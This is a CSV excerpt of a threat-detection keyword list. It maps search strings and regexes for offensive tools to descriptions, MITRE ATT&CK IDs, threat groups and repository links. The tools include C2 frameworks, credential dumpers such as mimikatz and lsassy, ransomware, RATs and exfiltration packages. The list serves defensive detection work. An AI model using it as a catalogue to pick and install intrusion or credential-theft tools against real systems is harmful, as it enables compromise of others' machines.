"*phpsploit_pipe exploit *",".{0,1000}phpsploit_pipe\sexploit\s.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54821"
"*phpsploit_pipe process *",".{0,1000}phpsploit_pipe\sprocess\s.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54822"
"*phpsploit_pipe set BROWSER*",".{0,1000}phpsploit_pipe\sset\sBROWSER.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54823"
"*phpsploit_pipe set PROXY *",".{0,1000}phpsploit_pipe\sset\sPROXY\s.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54824"
"*phpsploit-launcher.sh*",".{0,1000}phpsploit\-launcher\.sh.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","54825"
"*phra/Pezor*",".{0,1000}phra\/Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54826"
"*phra/Pezor/*",".{0,1000}phra\/Pezor\/.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54827"
"*PhrozenIO/SharpFtpC2*",".{0,1000}PhrozenIO\/SharpFtpC2.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","54828"
"*PhrozenIO/win-brute-logon*",".{0,1000}PhrozenIO\/win\-brute\-logon.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","54829"
"*phuip-fpizdam*",".{0,1000}phuip\-fpizdam.{0,1000}","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","N/A","10","1815","247","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z","54830"
"*physmem2profit.exe*",".{0,1000}physmem2profit\.exe.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","54831"
"*Physmem2profit.sln*",".{0,1000}Physmem2profit\.sln.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","54832"
"*physmem2profit-public.zip*",".{0,1000}physmem2profit\-public\.zip.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","54833"
"*piata_ssh_userpass.txt*",".{0,1000}piata_ssh_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54834"
"*PIC-Exec*runshellcode.asm*",".{0,1000}PIC\-Exec.{0,1000}runshellcode\.asm.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","54835"
"*PIC-Exec\addresshunter*",".{0,1000}PIC\-Exec\\addresshunter.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","54836"
"*PIC-Get-Privileges*",".{0,1000}PIC\-Get\-Privileges.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54837"
"*Pickfordmatt/SharpLocker*",".{0,1000}Pickfordmatt\/SharpLocker.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","1","N/A","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","54838"
"*PickleC2-main*",".{0,1000}PickleC2\-main.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","54839"
"*pico.sh/irc*",".{0,1000}pico\.sh\/irc.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","54840"
"*picosh/pico*",".{0,1000}picosh\/pico.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","54841"
"*-PID * -Assembly * -Arguments *",".{0,1000}\-PID\s.{0,100}\s\-Assembly\s.{0,1000}\s\-Arguments\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","54842"
"*pidof gonnacry*",".{0,1000}pidof\sgonnacry.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","N/A","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","54843"
"*ping 127.0.0.1 -n 4 > NUL && ""*",".{0,1000}ping\s127\.0\.0\.1\s\-n\s4\s\>\sNUL\s\&\&\s\"".{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","54844"
"*ping localhost -n 3 > NUL && del /A H /F *",".{0,1000}ping\slocalhost\s\-n\s3\s\>\sNUL\s\&\&\sdel\s\/A\sH\s\/F\s.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","54845"
"*Ping the PtC-RPC server inside LSASS*",".{0,1000}Ping\sthe\sPtC\-RPC\sserver\sinside\sLSASS.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","54847"
"*pingcastle.com*mysmartlogon.com*",".{0,1000}pingcastle\.com.{0,1000}mysmartlogon\.com.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","54849"
"*PingRAT.exe*",".{0,1000}PingRAT\.exe.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0005 - TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","54856"
"*ping-sweep*",".{0,1000}ping\-sweep.{0,1000}","offensive_tool_keyword","ping-sweep","Wrapper around the ping utility included by the OS. used for recon actiivities","T1016 - T1046","TA0007","N/A","N/A","Discovery","https://github.com/libresec/ping-sweep","1","0","N/A","N/A","N/A","1","1","0","2016-08-22T15:16:01Z","2016-08-22T02:07:46Z","54857"
"*PinoyWH1Z/AoratosWin*",".{0,1000}PinoyWH1Z\/AoratosWin.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","54858"
"*pip install coercer*",".{0,1000}pip\sinstall\scoercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","54859"
"*pip install conpass*",".{0,1000}pip\sinstall\sconpass.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","54860"
"*pip install dnschef*",".{0,1000}pip\sinstall\sdnschef.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","54861"
"*pip install donut-shellcode*",".{0,1000}pip\sinstall\sdonut\-shellcode.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54862"
"*pip install exegol*",".{0,1000}pip\sinstall\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54863"
"*pip install flask flask_cors && ./runserver.sh*",".{0,1000}pip\sinstall\sflask\sflask_cors\s\&\&\s\.\/runserver\.sh.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#linux","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","54864"
"*pip install gato-x*",".{0,1000}pip\sinstall\sgato\-x.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","54865"
"*pip install hiphp*",".{0,1000}pip\sinstall\shiphp.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","54866"
"*pip install impacket*",".{0,1000}pip\sinstall\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54867"
"*pip install knowsmore*",".{0,1000}pip\sinstall\sknowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","54868"
"*pip install lsassy*",".{0,1000}pip\sinstall\slsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","54869"
"*pip install quiet-riot*",".{0,1000}pip\sinstall\squiet\-riot.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","54871"
"*pip install rarce*",".{0,1000}pip\sinstall\srarce.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","54872"
"*pip install roadlib*",".{0,1000}pip\sinstall\sroadlib.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","54873"
"*pip install roadrecon*",".{0,1000}pip\sinstall\sroadrecon.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","54874"
"*pip install roadtx*",".{0,1000}pip\sinstall\sroadtx.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","54875"
"*pip install --user fee",".{0,1000}pip\sinstall\s\-\-user\sfee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","54879"
"*pip install --user PyExfil*",".{0,1000}pip\sinstall\s\-\-user\sPyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","54880"
"*pip uninstall autorecon*",".{0,1000}pip\suninstall\sautorecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","54881"
"*pip3 install bofhound*",".{0,1000}pip3\sinstall\sbofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","54883"
"*pip3 install powerview *",".{0,1000}pip3\sinstall\spowerview\s.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","54884"
"*pip3 install pypykatz*",".{0,1000}pip3\sinstall\spypykatz.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","54885"
"*pip3 install -U pacu*",".{0,1000}pip3\sinstall\s\-U\spacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54886"
"*pip3 install --upgrade knowsmore*",".{0,1000}pip3\sinstall\s\-\-upgrade\sknowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","54887"
"*pipe\\gsecdump_*",".{0,1000}pipe\\\\gsecdump_.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","54888"
"*'pipename_stager'*",".{0,1000}\'pipename_stager\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 